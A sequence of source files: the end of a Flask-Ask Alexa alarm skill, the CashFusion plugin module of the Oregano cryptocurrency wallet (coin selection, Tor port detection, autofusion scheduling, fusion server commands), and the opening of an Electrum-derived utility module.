speak_output = "Sorry, you are already friends with this user."
return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_SenderIsAlreadyFriend', speak_output)
if(response.status_code == 201):
speak_output = 'Okay. Friend request has been accepted from ' + sender_uname
return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_Success', speak_output)
else:
speak_output = 'Sorry. Failed to accept the friend request from ' + sender_uname
return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_Invalid', speak_output)
@ask.intent('AMAZON.HelpIntent')
def help():
# Intent designed to help the user use the application.
speech_text = """You can create an alarm by saying the following: Create an alarm for date at time.
For example, create an alarm for tomorrow at eight p.m.
If you want to leave Alarm Buddy, simply say cancel or stop.
If you want to record a sound, you can say: record a sound.
You can send a friend request by saying: send friend request to bob. You can also delete friends by saying: delete friend bob.
If you want to accept or deny a friend request, say: accept friend request from bob, or, deny friend request from bob.
If you want to cancel a friend request you sent, say: cancel my friend request to bob.
You can send a friend a sound by saying: send sound 123 to bob, where 123 is a sound i.d. . to figure out the i.d., you can say: get my sounds list.
You can also get your friend requests by saying: what are my friend requests? You can also get your friends list by saying: tell me my alarm buddy friends.
You can see who you have blocked by saying: who do I have blocked?
If you want to block a user, say: block user bob. If you want to unblock a user, say: unblock user bob."""
return question(speech_text).reprompt(speech_text).simple_card('Help', speech_text)
def record_audio(thread):
fs = 16000 # Sample rate
seconds = 10 # Duration of recording
mydevice = 4
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2, device=mydevice)
sd.wait() # Wait until recording is finished
write('output.wav', fs, myrecording) # Save as WAV file
sound = AudioSegment.from_wav('output.wav')
sound.export('amazon.mp3', format='mp3')
upload_file('amazon.mp3')
def upload_file(filename):
upload_url = config['base_url'] + '/upload/' + config['alarmbuddy_account']['username']
upload_header = {'authorization': token}
file_data = {'file': (filename, open(filename, 'rb'), 'audio/mpeg')}
info_data = {'soundDescription': 'Amazon Team Alexa MP3 Upload'}
u = requests.post(upload_url, headers=upload_header, files=file_data, data=info_data)
#put a check. If fails to upload, do something?
if(u.status_code != 201):
print("ERROR: file not uploaded.")
else:
print("file successfully uploaded to database from Alexa Pi.")
def play_alarm(thread):
# Function that is called at the time specified by the Create Alarm Intent
sounds_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']
sounds_header = {'Authorization': token}
f = requests.get(sounds_url, headers=sounds_header)
sounds_list = json.loads(f.content)
max_soundID = -1
for item in sounds_list:
if(max_soundID < item['soundID']):
max_soundID = item['soundID']
download_url = config['base_url'] + '/download/' + config['alarmbuddy_account']['username'] + '/' + str(max_soundID)
response = requests.get(download_url, headers={'Authorization': token})
#if fails to download sound, replace sound with default.
if(response.status_code != 200):
sound_path = os.getcwd() + '/alarm_buddy.mp3'
else:
open('downloadedsound.mp3', 'wb').write(response.content)
sound_path = os.getcwd() + '/downloadedsound.mp3'
print('playing sound at ' + sound_path)
playsound(sound_path)
@ask.session_ended
def session_ended():
return "{}", 200
if __name__ == '__main__':
if 'ASK_VERIFY_REQUESTS' in os.environ:
verify = str(os.environ.get('ASK_VERIFY_REQUESTS', '')).lower()
if verify == 'false':
app.config['ASK_VERIFY_REQUESTS'] = False
app.run(debug=True) |
plugin.py | #!/usr/bin/env python3
#
# Oregano - a lightweight Ergon client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Base plugin (non-GUI)
"""
import math
import threading
import time
import weakref
from typing import Optional, Tuple
from oregano.address import Address
from oregano.bitcoin import COINBASE_MATURITY
from oregano.plugins import BasePlugin, hook, daemon_command
from oregano.i18n import _, ngettext, pgettext
from oregano.util import profiler, PrintError, InvalidPassword
from oregano import Network, networks
from .conf import Conf, Global
from .fusion import Fusion, can_fuse_from, can_fuse_to, is_tor_port, MIN_TX_COMPONENTS
from .server import FusionServer
from .covert import limiter
import random # only used to select random coins
TOR_PORTS = [9050, 9150]
# if more than <N> tor connections have been made recently (see covert.py) then don't start auto-fuses.
AUTOFUSE_RECENT_TOR_LIMIT_LOWER = 60
# if more than <N> tor connections have been made recently (see covert.py) then shut down auto-fuses that aren't yet started
AUTOFUSE_RECENT_TOR_LIMIT_UPPER = 120
# heuristic factor: guess that expected number of coins in wallet in equilibrium is = (this number) / fraction
COIN_FRACTION_FUDGE_FACTOR = 10
# for semi-linked addresses (that share txids in their history), allow linking them with this probability:
KEEP_LINKED_PROBABILITY = 0.1
# how long an auto-fusion may stay in 'waiting' state (without starting-soon) before it cancels itself
AUTOFUSE_INACTIVE_TIMEOUT = 600
# how many random coins to select max in 1 batch -- used by select_random_coins
DEFAULT_MAX_COINS = 20
assert DEFAULT_MAX_COINS > 10
# how many autofusions can be running per-wallet
MAX_AUTOFUSIONS_PER_WALLET = 10
CONSOLIDATE_MAX_OUTPUTS = MIN_TX_COMPONENTS // 3
pnp = None
def get_upnp():
""" return an initialized UPnP singleton """
global pnp
if pnp is not None:
return pnp
try:
import miniupnpc
except ImportError:
raise RuntimeError("python miniupnpc module not installed")
u = miniupnpc.UPnP()
if u.discover() < 1:
raise RuntimeError("can't find UPnP server")
try:
u.selectigd()
except Exception as e:
raise RuntimeError("failed to connect to UPnP IGD")
pnp = u
return u
def select_coins(wallet):
""" Sort the wallet's coins into address buckets, returning two lists:
- Eligible addresses and their coins.
- Ineligible addresses and their coins.
An address is eligible if it satisfies all conditions:
- the address is unfrozen
- has 1, 2, or 3 utxo
- all utxo are confirmed (or matured in case of coinbases)
- has no SLP utxo or frozen utxo
"""
# First, select all the coins
eligible = []
ineligible = []
has_unconfirmed = False
has_coinbase = False
sum_value = 0
mincbheight = (wallet.get_local_height() + 1 - COINBASE_MATURITY if Conf(wallet).autofuse_coinbase
else -1) # -1 here causes coinbase coins to always be rejected
for addr in wallet.get_addresses():
acoins = list(wallet.get_addr_utxo(addr).values())
if not acoins:
continue # prevent inserting empty lists into eligible/ineligible
good = True
if addr in wallet.frozen_addresses:
good = False
for i,c in enumerate(acoins):
sum_value += c['value'] # tally up values regardless of eligibility
# If too many coins, any SLP tokens, any frozen coins, or any
# immature coinbase on the address -> flag all address coins as
# ineligible if not already flagged as such.
good = good and (
i < 3 # must not have too many coins on the same address*
and not c['slp_token'] # must not be SLP
and not c['is_frozen_coin'] # must not be frozen
and (not c['coinbase'] or c['height'] <= mincbheight) # if coinbase -> must be mature coinbase
)
# * = We skip addresses with too many coins, since they take up lots
# of 'space' for consolidation. TODO: there is possibility of
# disruption here, if we get dust spammed. Need to deal with
# 'dusty' addresses by ignoring / consolidating dusty coins.
# Next, detect has_unconfirmed & has_coinbase:
if c['height'] <= 0:
# Unconfirmed -> Flag as not eligible and set the has_unconfirmed flag.
good = False
has_unconfirmed = True
# Update has_coinbase flag if not already set
has_coinbase = has_coinbase or c['coinbase']
if good:
eligible.append((addr,acoins))
else:
ineligible.append((addr,acoins))
return eligible, ineligible, int(sum_value), bool(has_unconfirmed), bool(has_coinbase)
def select_random_coins(wallet, fraction, eligible):
"""
Grab wallet coins with a certain probability, while also paying attention
to obvious linkages and possible linkages.
Returns list of list of coins (bucketed by obvious linkage).
"""
# First, we want to bucket coins together when they have obvious linkage.
# Coins that are linked together should be spent together.
# Currently, just look at address.
addr_coins = eligible
random.shuffle(addr_coins)
# While fusing we want to pay attention to semi-correlations among coins.
# When we fuse semi-linked coins, it increases the linkage. So we try to
# avoid doing that (but rarely, we just do it anyway :D).
# Currently, we just look at all txids touched by the address.
# (TODO this is a disruption vector: someone can spam multiple fusions'
# output addrs with massive dust transactions (2900 outputs in 100 kB)
# that make the plugin think that all those addresses are linked.)
result_txids = set()
result = []
num_coins = 0
for addr, acoins in addr_coins:
if num_coins >= DEFAULT_MAX_COINS:
break
elif num_coins + len(acoins) > DEFAULT_MAX_COINS:
continue
# For each bucket, we give a separate chance of joining.
if random.random() > fraction:
continue
# Semi-linkage check:
# We consider all txids involving the address, historical and current.
ctxids = {txid for txid, height in wallet.get_address_history(addr)}
collisions = ctxids.intersection(result_txids)
# Note each collision gives a separate chance of discarding this bucket.
if random.random() > KEEP_LINKED_PROBABILITY**len(collisions):
continue
# OK, no problems: let's include this bucket.
num_coins += len(acoins)
result.append(acoins)
result_txids.update(ctxids)
if not result:
# nothing was selected, just try grabbing first nonempty bucket
try:
res = next(coins for addr,coins in addr_coins if coins)
result = [res]
except StopIteration:
# all eligible buckets were cleared.
pass
return result
def get_target_params_1(wallet, wallet_conf, active_autofusions, eligible):
""" WIP -- TODO: Rename this function. """
wallet_conf = Conf(wallet)
mode = wallet_conf.fusion_mode
# Note each fusion 'consumes' a certain number of coins by freezing them,
# so that the next fusion has less eligible coins to work with. So each
# call to this may see a smaller n_buckets.
n_buckets = len(eligible)
if mode == 'normal':
return max(2, round(n_buckets / DEFAULT_MAX_COINS)), False
elif mode == 'fan-out':
return max(4, math.ceil(n_buckets / (COIN_FRACTION_FUDGE_FACTOR*0.65))), False
elif mode == 'consolidate':
if n_buckets < MIN_TX_COMPONENTS - CONSOLIDATE_MAX_OUTPUTS:
# Too few eligible buckets to make an effective consolidation.
return 0, False
# In the latter stages of consolidation, only do one fusion
# at a time with all-confirmed rule, to make sure each fusion's outputs
# may be consumed by the subsequent one.
# To avoid weird loops, try to calculate the TOTAL number of coins
# that are either 1) eligible or 2) being fused. (Should stay constant
# as fusions are added/cancelled)
n_coins = sum(len(acoins) for addr,acoins in eligible)
n_total = n_coins + sum(len(getattr(f, 'inputs', ())) for f in active_autofusions)
if n_total < DEFAULT_MAX_COINS*3:
return 1, True
# If coins are scarce then don't make more autofusions unless we
# have none.
if n_buckets < DEFAULT_MAX_COINS*2:
return 1, False
# We still have lots of coins left, so request another autofusion.
return MAX_AUTOFUSIONS_PER_WALLET, False
else: # 'custom'
target_num_auto = wallet_conf.queued_autofuse
confirmed_only = wallet_conf.autofuse_confirmed_only
return int(target_num_auto), bool(confirmed_only)
def get_target_params_2(wallet_conf, sum_value):
""" WIP -- TODO: Rename this function. """
mode = wallet_conf.fusion_mode
fraction = 0.1
if mode == 'custom':
# Determine the fraction that should be used
select_type, select_amount = wallet_conf.selector
if select_type == 'size' and int(sum_value) != 0:
# user wants to get a typical output of this size (in sats)
fraction = COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value
elif select_type == 'count' and int(select_amount) != 0:
# user wants this number of coins
fraction = COIN_FRACTION_FUDGE_FACTOR / select_amount
elif select_type == 'fraction':
# user wants this fraction
fraction = select_amount
# note: fraction at this point could be <0 or >1 but doesn't matter.
elif mode == 'consolidate':
fraction = 1.0
elif mode == 'normal':
fraction = 0.5
elif mode == 'fan-out':
fraction = 0.1
return fraction
class FusionPlugin(BasePlugin):
fusion_server = None
active = True
_run_iter = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs) # gives us self.config
# Do an initial check on the tor port
self.tor_port_good = None
t = threading.Thread(name = 'Fusion-scan_torport_initial', target = self.scan_torport)
t.start()
# quick lock for the following two WeakKeyDictionary variables
# Locking order wallet.lock -> plugin.lock.
self.lock = threading.Lock()
self.fusions = weakref.WeakKeyDictionary()
self.autofusing_wallets = weakref.WeakKeyDictionary() # wallet -> password
self.t_last_net_ok = time.monotonic()
self.remote_donation_address: str = '' # optionally announced by the remote server in 'serverhello' message
if tuple(self.config.get('cashfusion_server', ())) == ('cashfusion.oregano.dk', 8787, False):
# User's config has the old default non-SSL server. If we see this,
# just wipe the config key so that the new default is used.
# But only reset once, after that let them go back if that is what
# they truly desire.
if self.config.get('cashfusion_server_defaultresetted', 0) < 1:
self.config.set_key('cashfusion_server', None)
self.config.set_key('cashfusion_server_defaultresetted', 1)
def on_close(self,):
super().on_close()
self.stop_fusion_server()
self.active = False
def fullname(self):
return 'CashFusion'
def description(self):
return _("CashFusion Protocol")
def is_available(self):
return networks.net is not networks.TaxCoinNet
def set_remote_donation_address(self, address : str):
self.remote_donation_address = ((isinstance(address, str) and address) or '')[:100]
def get_server(self, ):
return Global(self.config).server
def set_server(self, host, port, ssl):
gconf = Global(self.config)
old = gconf.server
gconf.server = (host, port, ssl) # type/sanity checking done in setter
if old != gconf.server:
self.on_server_changed()
def get_torhost(self):
if self.has_auto_torport():
return Global.Defaults.TorHost
else:
return Global(self.config).tor_host
def set_torhost(self, host):
''' host should be a valid hostname '''
if not host: return
Global(self.config).tor_host = host
def has_auto_torport(self, ):
return Global(self.config).tor_port_auto
def get_torport(self, ):
''' Retreive either manual port or autodetected port; may return None
if 'auto' mode and no Tor port has been autodetected. (this is non-blocking) '''
if self.has_auto_torport():
return self.tor_port_good
else:
return Global(self.config).tor_port_manual
def set_torport(self, port):
# port may be 'auto' or 'manual' or an int
gconf = Global(self.config)
if port == 'auto':
gconf.tor_port_auto = True
return
else:
gconf.tor_port_auto = False
if port == 'manual':
return # we're simply going to use whatever manual port was already set
assert isinstance(port, int)
gconf.tor_port_manual = port
def scan_torport(self, ):
''' Scan for Tor proxy on either the manual port or on a series of
automatic ports. This is blocking. Returns port if it's up, or None if
down / can't find. '''
host = self.get_torhost()
if self.has_auto_torport():
portlist = []
network = Network.get_instance()
if network:
tc = network.tor_controller
if tc and tc.is_enabled() and tc.active_socks_port:
portlist.append(tc.active_socks_port)
portlist.extend(TOR_PORTS)
else:
portlist = [ Global(self.config).tor_port_manual ]
for port in portlist:
if is_tor_port(host, port):
self.tor_port_good = port
break
else:
self.tor_port_good = None
return self.tor_port_good
def on_server_changed(self):
""" When the server is changed, we stop all extant fusions that are not
already 'running' in order to allow for the new change to take effect
immediately. """
self.remote_donation_address = ''
self.stop_all_fusions('Server changed', not_if_running=True)
def get_all_fusions(self, ):
""" Return all still-live fusion objects that have been created using .start_fusion(),
including autofusions and any other fusions. """
with self.lock:
fusions_and_times = list(self.fusions.items())
fusions_and_times.sort(key=lambda x:x[1])
return [f for f,t in fusions_and_times]
def stop_all_fusions(self, reason, *, not_if_running=True):
with self.lock:
for f in list(self.fusions):
f.stop(reason, not_if_running = not_if_running)
@staticmethod
def stop_autofusions(wallet, reason, *, not_if_running=True):
with wallet.lock:
try:
fusion_weakset = wallet._fusions_auto
except AttributeError:
return []
running = []
for f in list(fusion_weakset):
if not f.is_alive():
fusion_weakset.discard(f)
continue
f.stop(reason, not_if_running = not_if_running)
if f.status[0] == 'running':
running.append(f)
return running
def disable_autofusing(self, wallet):
with self.lock:
self.autofusing_wallets.pop(wallet, None)
Conf(wallet).autofuse = False
return self.stop_autofusions(wallet, 'Autofusing disabled', not_if_running=True)
def enable_autofusing(self, wallet, password):
if password is None and wallet.has_password():
raise InvalidPassword()
else:
wallet.check_password(password)
with self.lock:
self.autofusing_wallets[wallet] = password
Conf(wallet).autofuse = True
def is_autofusing(self, wallet):
with self.lock:
return (wallet in self.autofusing_wallets)
def add_wallet(self, wallet, password=None):
''' Attach the given wallet to fusion plugin, allowing it to be used in
fusions with clean shutdown. Also start auto-fusions for wallets that want
it (if no password).
'''
with wallet.lock:
# Generate wallet._fusions and wallet._fusions_auto; these must
# only be accessed with wallet.lock held.
# all fusions relating to this wallet, either as source or target
# or both.
wallet._fusions = weakref.WeakSet()
# fusions that were auto-started.
wallet._fusions_auto = weakref.WeakSet()
# all accesses to the above must be protected by wallet.lock
if Conf(wallet).autofuse:
try:
self.enable_autofusing(wallet, password)
except InvalidPassword:
self.disable_autofusing(wallet)
def remove_wallet(self, wallet):
''' Detach the provided wallet; returns list of active fusion threads. '''
with self.lock:
self.autofusing_wallets.pop(wallet, None)
fusions = ()
try:
with wallet.lock:
fusions = list(wallet._fusions)
del wallet._fusions
del wallet._fusions_auto
except AttributeError:
pass
return [f for f in fusions if f.is_alive()]
def start_fusion(self, source_wallet, password, coins, target_wallet = None, max_outputs = None, inactive_timeout = None):
""" Create and start a new Fusion object with current server/tor settings.
Both source_wallet.lock and target_wallet.lock must be held.
FIXME: this condition is begging for a deadlock to happen when the two wallets
are different. Need to find a better way if inter-wallet fusing actually happens.
"""
if target_wallet is None:
target_wallet = source_wallet # self-fuse
assert can_fuse_from(source_wallet)
assert can_fuse_to(target_wallet)
host, port, ssl = self.get_server()
if host == 'localhost':
# as a special exemption for the local fusion server, we don't use Tor.
torhost = None
torport = None
else:
torhost = self.get_torhost()
torport = self.get_torport()
if torport is None:
torport = self.scan_torport() # may block for a very short time ...
if torport is None:
self.notify_server_status(False, ("failed", _("Invalid Tor proxy or no Tor proxy found")))
raise RuntimeError("can't find tor port")
fusion = Fusion(self, target_wallet, host, port, ssl, torhost, torport)
fusion.add_coins_from_wallet(source_wallet, password, coins)
fusion.max_outputs = max_outputs
with self.lock:
fusion.start(inactive_timeout = inactive_timeout)
self.fusions[fusion] = time.time()
target_wallet._fusions.add(fusion)
source_wallet._fusions.add(fusion)
return fusion
def thread_jobs(self, ):
return [self]
def run(self, ):
# this gets called roughly every 0.1 s in the Plugins thread; downclock it to 5 s.
run_iter = self._run_iter + 1
if run_iter < 50:
self._run_iter = run_iter
return
else:
self._run_iter = 0
if not self.active:
return
dont_start_fusions = False
network = Network.get_instance()
if network and network.is_connected():
self.t_last_net_ok = time.monotonic()
else:
# Cashfusion needs an accurate picture of the wallet's coin set, so
# that we don't reuse addresses and we don't submit already-spent coins.
# Currently the network is not synced so we won't start new fusions.
dont_start_fusions = True
if time.monotonic() - self.t_last_net_ok > 31:
# If the network is disconnected for an extended period, we also
# shut down all waiting fusions. We can't wait too long because
# one fusion might succeed but then enter the 'time_wait' period
# where it is waiting to see the transaction on the network.
# After 60 seconds it gives up and then will unreserve addresses,
# and currently-waiting fusions would then grab those addresses when
# they begin rounds.
self.stop_all_fusions('Lost connection to Oregano server', not_if_running = True)
return
# Snapshot of autofusing list; note that remove_wallet may get
# called on one of the wallets, after lock is released.
with self.lock:
wallets_and_passwords = list(self.autofusing_wallets.items())
torcount = limiter.count
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_UPPER:
# need tor cooldown, stop the waiting autofusions
for wallet, password in wallets_and_passwords:
self.stop_autofusions(wallet, 'Tor cooldown', not_if_running = True)
return
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_LOWER:
# no urgent need to stop fusions, but don't queue up any more.
dont_start_fusions = True
for wallet, password in wallets_and_passwords:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
continue
if not wallet.up_to_date:
# We want a good view of the wallet so we know which coins
# are unspent and confirmed, and we know which addrs are
# used. Note: this `continue` will bypass the potential .stop()
# below.
continue
for f in list(wallet._fusions_auto):
if not f.is_alive():
wallet._fusions_auto.discard(f)
active_autofusions = list(wallet._fusions_auto)
if dont_start_fusions and not active_autofusions:
continue
num_auto = len(active_autofusions)
wallet_conf = Conf(wallet)
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(wallet)
target_num_auto, confirmed_only = get_target_params_1(wallet, wallet_conf, active_autofusions, eligible)
if confirmed_only and has_unconfirmed:
for f in list(wallet._fusions_auto):
f.stop('Wallet has unconfirmed coins... waiting.', not_if_running = True)
continue
if not dont_start_fusions and num_auto < min(target_num_auto, MAX_AUTOFUSIONS_PER_WALLET):
# we don't have enough auto-fusions running, so start one
fraction = get_target_params_2(wallet_conf, sum_value)
chosen_buckets = select_random_coins(wallet, fraction, eligible)
coins = [c for l in chosen_buckets for c in l]
if not coins:
self.print_error("auto-fusion skipped due to lack of coins")
continue
if wallet_conf.fusion_mode == 'consolidate':
max_outputs = CONSOLIDATE_MAX_OUTPUTS
if len(chosen_buckets) < (MIN_TX_COMPONENTS - max_outputs):
self.print_error("consolidating auto-fusion skipped due to lack of unrelated coins")
continue
else:
max_outputs = None
try:
f = self.start_fusion(wallet, password, coins, max_outputs = max_outputs, inactive_timeout = AUTOFUSE_INACTIVE_TIMEOUT)
self.print_error("started auto-fusion")
except RuntimeError as e:
self.print_error(f"auto-fusion skipped due to error: {e}")
return
wallet._fusions_auto.add(f)
def start_fusion_server(self, network, bindhost, port, upnp = None, announcehost = None, donation_address = None):
if self.fusion_server:
raise RuntimeError("server already running")
donation_address = (isinstance(donation_address, Address) and donation_address) or None
self.fusion_server = FusionServer(self.config, network, bindhost, port, upnp = upnp, announcehost = announcehost, donation_address = donation_address)
self.fusion_server.start()
return self.fusion_server.host, self.fusion_server.port
def stop_fusion_server(self):
try:
self.fusion_server.stop('server stopped by operator')
self.fusion_server = None
except Exception:
pass
def update_coins_ui(self, wallet):
''' Default implementation does nothing. Qt plugin subclass overrides
this, which sends a signal to the main thread to update the coins tab.
This is called by the Fusion thread (in its thread context) when it
freezes & unfreezes coins. '''
def notify_server_status(self, b, tup : tuple = None):
''' The Qt plugin subclass implements this to tell the GUI about bad
servers. '''
if not b: self.print_error("notify_server_status:", b, str(tup))
@hook
def donation_address(self, window) -> Optional[Tuple[str,Address]]:
''' Plugin API: Returns a tuple of (description, Address) or None. This
is the donation address that we as a client got from the remote server
(as opposed to the donation address we announce if we are a server). '''
if self.remote_donation_address and Address.is_valid(self.remote_donation_address):
return (self.fullname() + " " + _("Server") + ": " + self.get_server()[0], Address.from_string(self.remote_donation_address))
@daemon_command
def fusion_server_start(self, daemon, config):
# Usage:
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port>
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> <donation_addr>
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp <donation_addr>
# e.g.:
# ./oregano daemon fusion_server_start 0.0.0.0,myfusionserver.com 8787 upnp bitcoincash:qpxiweuqoiweweqeweqw
#
# The main server port will be bound on <bindhost>:<port>.
# Covert submissions will be bound on <bindhost>:<ephemeral_port> (the port is chosen by the OS)
# The main server will tell clients to connect to <announcehost>:<ephemeral_port> .
# The default announcehost is based on an autodetection system, which may not work for some server networking setups.
network = daemon.network
if not network:
return "error: cannot run fusion server without an SPV server connection"
def invoke(firstarg = '0.0.0.0', sport='8787', upnp_str = None, addr_str = None):
bindhost, *extrahosts = firstarg.split(',')
if len(extrahosts) > 1:
raise Exception("too many hosts")
elif len(extrahosts) == 1:
[announcehost,] = extrahosts
else:
announcehost = None
port = int(sport)
pnp = get_upnp() if upnp_str == 'upnp' else None
if not pnp and not addr_str:
# third arg may be addr_str, so swap the args
addr_str = upnp_str
upnp_str = None
addr = None
if addr_str:
assert Address.is_valid(addr_str), "Invalid donation address specified"
addr = Address.from_string(addr_str)
return self.start_fusion_server(network, bindhost, port, upnp = pnp, announcehost = announcehost, donation_address = addr)
try:
host, port = invoke(*config.get('subargs', ()))
except Exception as e:
import traceback, sys; traceback.print_exc(file=sys.stderr)
return f'error: {str(e)}'
return (host, port)
@daemon_command
def fusion_server_stop(self, daemon, config):
self.stop_fusion_server()
return 'ok'
@daemon_command
def fusion_server_status(self, daemon, config):
if not self.fusion_server:
return "fusion server not running"
return dict(poolsizes = {t: len(pool.pool) for t,pool in self.fusion_server.waiting_pools.items()})
@daemon_command
def fusion_server_fuse(self, daemon, config):
if self.fusion_server is None:
return
subargs = config.get('subargs', ())
if len(subargs) != 1:
return "expecting tier"
tier = int(subargs[0])
num_clients = self.fusion_server.start_fuse(tier)
return num_clients
|
util.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['BTC', 'mBTC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
